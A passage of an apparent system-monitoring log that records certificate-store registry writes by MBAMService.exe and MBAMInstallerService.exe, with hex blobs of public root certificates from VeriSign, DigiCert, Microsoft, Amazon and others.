23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 0f0000000100000010000000a2011111cc748d961c35c67a0d5c8af5620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce446090000000100000016000000301406082b0601050507030306082b06010505070304140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea0b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000177f789e96523e206c796917c848d50f7e0000000100000008000000000010c51e92d201680000000100000008000000000036044ddfd30103000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b20000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 040000000100000010000000cb17e431673ee209fe455793f30afa1c0f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c953000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df1400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331330b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3617e000000010000000800000000c0032f2df8d6016800000001000000000000000300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e5190000000100000010000000d8b5fb368468620275d142ffd2aade372000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D772DA0874059418FCDAACE3F4FF2AC964A852FF\Blob = 030000000100000014000000d772da0874059418fcdaace3f4ff2ac964a852ff140000000100000014000000246593980801e84ed4d64cea6455e1c0fafbcfb3040000000100000010000000fe9ab1791f2f2a2a01fce48d6b2a093c0f000000010000003000000054de7e1f5b9b2c1834c8e4fedef7bec89e6e7117ef761a80d1bccec1d63888d0d4ad1b6c5c6a4ea556436ddd29aaf904190000000100000010000000ce4cfdd3ed415f0993c3c8bd5428ecbb5c0000000100000004000000000c0000180000000100000010000000ea6089055218053dd01e37e1d806eedf200000000100000048060000308206443082042ca0030201020211009e02b0e94aceb2109ca1e9836be0c2db300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3231303532353030303030305a170d3336303532343233353935395a304f310b300906035504061302474231183016060355040a130f5365637469676f204c696d69746564312630240603550403131d5365637469676f2052534120436f6465205369676e696e672043412032308201a2300d06092a864886f70d01010105000382018f003082018a0282018100bb7bff8fbf4b2d43b6f1661c00ff8d9d2a7840c4234c4349a709395a45510b16fdee6031f53470e363075bec932a725a16385216091d2f53efa83eec3aa07ba25348802d95959b14ddb213f617c13b2612049cde3d4c4a3d33c30c26256f3d6e0f9503b18433c690499ef9e636778f006324606f5d61e44d1b0df783548cbc4f8a7c20f42a20aa61a02d902877d351569c94cca6f421cad8be289a4a1e5486c3f6ec6c6ac10e69d339b273758ff0abf75b77391ea30672e23287f97fc61413e468911d33a9c7b3302db6a9c581ef21848aba96ec110364e5dfbaa9c18d4e7e2cdffbc380c1a8296a321225fa20451c29f5549adf8ae067f1310f0a11c63170afbc803b177ec3f23626be3c37cf37b85d795497b8bbc37f76056a359f8213194f2af37dc9b988166a4c38d82b61e5615b571a0ec7fd7bb76b0a42401ff30fe0ec70ba6a79571889c71df7309f430a0715067245a3575ebfa3ed584c62197566c21b0175a6560d1461b5765bf137b4040503c1c4a3ff5dcaf49dbae72f16f6b67b0203010001a382015f3082015b301f0603551d230418301680145379bf5aaa2b4acf5480e1d89bc09df2b20366cb301d0603551d0e04160414246593980801e84ed4d64cea6455e1c0fafbcfb3300e0603551d0f0101ff04040302018630120603551d130101ff040830060101ff02010030130603551d25040c300a06082b06010505070303301b0603551d200414301230060604551d20003008060667810c01040130500603551d1f044930473045a043a041863f687474703a2f2f63726c2e7573657274727573742e636f6d2f55534552547275737452534143657274696669636174696f6e417574686f726974792e63726c307106082b0601050507010104653063303a06082b06010505073002862e687474703a2f2f6372742e7573657274727573742e636f6d2f55534552547275737452534141414143412e637274302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c0500038202010055d1f2be5bc5485740e5ecd9faeffd6b92fca8754779e9cfc23d14f9a109e565b9ad9fbc4ef29da2e735cccfa2392b472bc0e0ba36902366d1126488d95751add00f6f5f8a90cf1bb17a6956fac2400a85bfe1bae0cd72337817684ef2eb0276135b8529532e1d3caf14b46c0333f437a1ed90453ff573bca9925017ebfe39ca4640eafba3b4179b585ac5004f6cd30cc05f6f867781a63d2516f62fa249f093bed557723cb3c8d21b129930221003f64a89e0928fa8c338600f2156d4ebab5733a777dd27e591539e2f671f4bc38bf4656392ce9512561e1daee2ed8074beec4dfeecc717d79493974c464cc54662e53b9d1a08c0630ad519cc0ab089cc8b2e084578d969ec7d0db7cf86a12ec3e0860e3709e44bc50c73c8f628dc9ed5959a235771ce406d9d5bea1bc3b2492444f41004caeda6925f54d6097b3ab992d310111499b6ce40ffe5c6a3776635adec33a03bc8c69e3ea19985587cb1a85a38e62e53ac7ffd133beb57d46dfdf21ce2f78cb42ef6d754ef23ed29b10ccb1f9a3cd82f9e0d66499f508786a0f1f9ca1cb01dc3f14c9efcd3a64feef466b642d170b95b948385bbd44479771188b1a071eafa4bf0ff8708cd8a8866ba87405c9488d8ad0a0742f7bee4cb993791318d9a6810fe9a03bc150226b79e70bd19804cecf00280fbff4ca2b76ebfe3d8e4dcf7c8856b986ed21371dceecac9ae317e7b05	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 5c000000010000000400000000040000190000000100000010000000e53d34cecb05c17ee332c749d78c02560f000000010000001000000065fc47520f66383962ec0b7b88a0821d03000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd2509000000010000000c000000300a06082b060105050703080b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e00670020004300410000001400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f0040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa2000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E	MBAMInstallerService.exe
